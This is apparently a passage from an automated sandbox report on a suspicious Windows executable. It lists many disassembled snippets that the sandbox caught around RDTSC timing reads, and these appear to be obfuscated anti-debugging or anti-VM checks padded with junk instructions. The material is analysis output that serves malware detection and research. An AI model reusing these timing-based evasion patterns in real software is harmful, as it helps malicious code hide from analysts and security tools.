                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6989D second address: D698A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D698A3 second address: D69908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FD2D0B60AE8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dword ptr [ebp+1245DA00h], eax 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D1BCFh], edi 0x00000036 push 00000000h 0x00000038 mov edi, 7DF52119h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FD2D0B60AF3h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69908 second address: D69912 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD2D0DFA0CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69AEA second address: D69AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D90E second address: D6D968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007FD2D0DFA0CFh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FD2D0DFA0C8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov ebx, 063BFB7Ch 0x0000002f push 00000000h 0x00000031 jmp 00007FD2D0DFA0D2h 0x00000036 push eax 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D968 second address: D6D96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D96C second address: D6D970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EA03 second address: D6EA07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23ED1 second address: D23ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EC11 second address: D6EC17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23ED5 second address: D23EE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FD2D0DFA0C6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EC17 second address: D6EC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23EE5 second address: D23EFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EC1B second address: D6ECA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov bx, si 0x0000000f push dword ptr fs:[00000000h] 0x00000016 and edi, 7520EBC3h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov edi, dword ptr [ebp+122D1908h] 0x00000029 mov eax, dword ptr [ebp+122D138Dh] 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007FD2D0B60AE8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 mov edi, eax 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007FD2D0B60AE8h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 0000001Bh 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 xor edi, dword ptr [ebp+122D3563h] 0x0000006d nop 0x0000006e push eax 0x0000006f push edx 0x00000070 push ebx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70F46 second address: D70F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2D0DFA0D1h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ECA9 second address: D6ECAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ECAE second address: D6ECB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72E7F second address: D72E84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72E84 second address: D72E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72E91 second address: D72E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD2D0B60AE6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72E9C second address: D72F01 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD2D0DFA0C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov di, cx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FD2D0DFA0C8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a add dword ptr [ebp+122D32EDh], ecx 0x00000030 push 00000000h 0x00000032 mov edi, dword ptr [ebp+122D35BFh] 0x00000038 xchg eax, esi 0x00000039 ja 00007FD2D0DFA0D7h 0x0000003f js 00007FD2D0DFA0D1h 0x00000045 jmp 00007FD2D0DFA0CBh 0x0000004a push eax 0x0000004b pushad 0x0000004c jo 00007FD2D0DFA0CCh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73F54 second address: D73F6B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2D0B60AE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FD2D0B60AE8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73F6B second address: D73F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0DFA0D1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73F80 second address: D73FB5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD2D0B60AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d xor dword ptr [ebp+122D334Ah], edx 0x00000013 push 00000000h 0x00000015 mov edi, ecx 0x00000017 push 00000000h 0x00000019 call 00007FD2D0B60AEEh 0x0000001e mov ebx, dword ptr [ebp+122D36EBh] 0x00000024 pop ebx 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pushad 0x0000002a popad 0x0000002b pop eax 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73FB5 second address: D73FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD2D0DFA0C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73FBF second address: D73FDB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD2D0B60AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD2D0B60AECh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7202A second address: D7203F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0DFA0D0h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D730C9 second address: D730CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D730CD second address: D730DB instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7203F second address: D720E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD2D0B60AEDh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FD2D0B60AE8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a stc 0x0000002b push dword ptr fs:[00000000h] 0x00000032 mov ebx, dword ptr [ebp+122D36BFh] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f sub dword ptr [ebp+122D2E9Dh], ebx 0x00000045 mov eax, dword ptr [ebp+122D12BDh] 0x0000004b sub dword ptr [ebp+122D2E0Eh], ecx 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push edx 0x00000056 call 00007FD2D0B60AE8h 0x0000005b pop edx 0x0000005c mov dword ptr [esp+04h], edx 0x00000060 add dword ptr [esp+04h], 0000001Dh 0x00000068 inc edx 0x00000069 push edx 0x0000006a ret 0x0000006b pop edx 0x0000006c ret 0x0000006d sub dword ptr [ebp+122D1ADDh], edi 0x00000073 push eax 0x00000074 push ecx 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D730DB second address: D730DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D720E3 second address: D720E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D730DF second address: D73154 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, si 0x0000000b push dword ptr fs:[00000000h] 0x00000012 jmp 00007FD2D0DFA0CCh 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e xor dword ptr [ebp+122D2C42h], esi 0x00000024 mov eax, dword ptr [ebp+122D1725h] 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007FD2D0DFA0C8h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D2E94h], ecx 0x0000004a push FFFFFFFFh 0x0000004c movsx edi, ax 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007FD2D0DFA0D5h 0x00000058 push eax 0x00000059 pop eax 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73154 second address: D73170 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2D0B60AEFh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73170 second address: D7317A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D752BF second address: D752C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D752C5 second address: D752E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jns 00007FD2D0DFA0C6h 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7412B second address: D7414A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7414A second address: D7414E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7414E second address: D74158 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD2D0B60AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7637A second address: D7637E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75456 second address: D75464 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7637E second address: D7640E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FD2D0DFA0D2h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FD2D0DFA0C8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jmp 00007FD2D0DFA0CDh 0x00000034 jmp 00007FD2D0DFA0D1h 0x00000039 push 00000000h 0x0000003b jmp 00007FD2D0DFA0D1h 0x00000040 mov ebx, edi 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FD2D0DFA0D7h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75464 second address: D75469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7640E second address: D76418 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0DFA0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7556C second address: D75575 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D774C5 second address: D77512 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2D0DFA0CCh 0x00000008 jbe 00007FD2D0DFA0C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 sbb di, 0E1Bh 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 mov dword ptr [ebp+122D2E5Ah], edi 0x0000001f pop edi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007FD2D0DFA0C8h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jbe 00007FD2D0DFA0C8h 0x00000045 push esi 0x00000046 pop esi 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7662D second address: D76631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76631 second address: D76637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76637 second address: D76641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD2D0B60AE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76641 second address: D76652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7772A second address: D77734 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD2D0B60AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D77734 second address: D77761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2D0DFA0D6h 0x00000008 ja 00007FD2D0DFA0C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD2D0DFA0C8h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7CFB4 second address: D7CFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80A8F second address: D80AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0DFA0D4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80AAE second address: D80AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80AB2 second address: D80AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80AB6 second address: D80ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80ABC second address: D80ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D0DFA0CDh 0x00000009 jmp 00007FD2D0DFA0D0h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80ADD second address: D80AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80AE1 second address: D80AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0DFA0D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80C3E second address: D80C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80C42 second address: D80C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80C4C second address: D80C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80C50 second address: D80C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD2D0DFA0D4h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D835AF second address: D835B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D835B3 second address: D835D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0DFA0CBh 0x00000007 push ebx 0x00000008 js 00007FD2D0DFA0C6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007FD2D0DFA0C8h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8637A second address: D863C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D0B60AF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FD2D0B60AF5h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jmp 00007FD2D0B60AF0h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D863C3 second address: D863C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D14A second address: D8D150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D150 second address: D8D154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D154 second address: D8D166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007FD2D0B60AE6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D166 second address: D8D170 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD2D0DFA0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BDCA second address: D8BDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD2D0B60AE6h 0x0000000a jmp 00007FD2D0B60AF1h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C5A0 second address: D8C5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2D0DFA0D9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C5BD second address: D8C5E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD2D0B60AF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f popad 0x00000010 js 00007FD2D0B60B05h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C5E9 second address: D8C5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C728 second address: D8C751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FD2D0B60AEBh 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jl 00007FD2D0B60AE6h 0x00000016 jnp 00007FD2D0B60AE6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
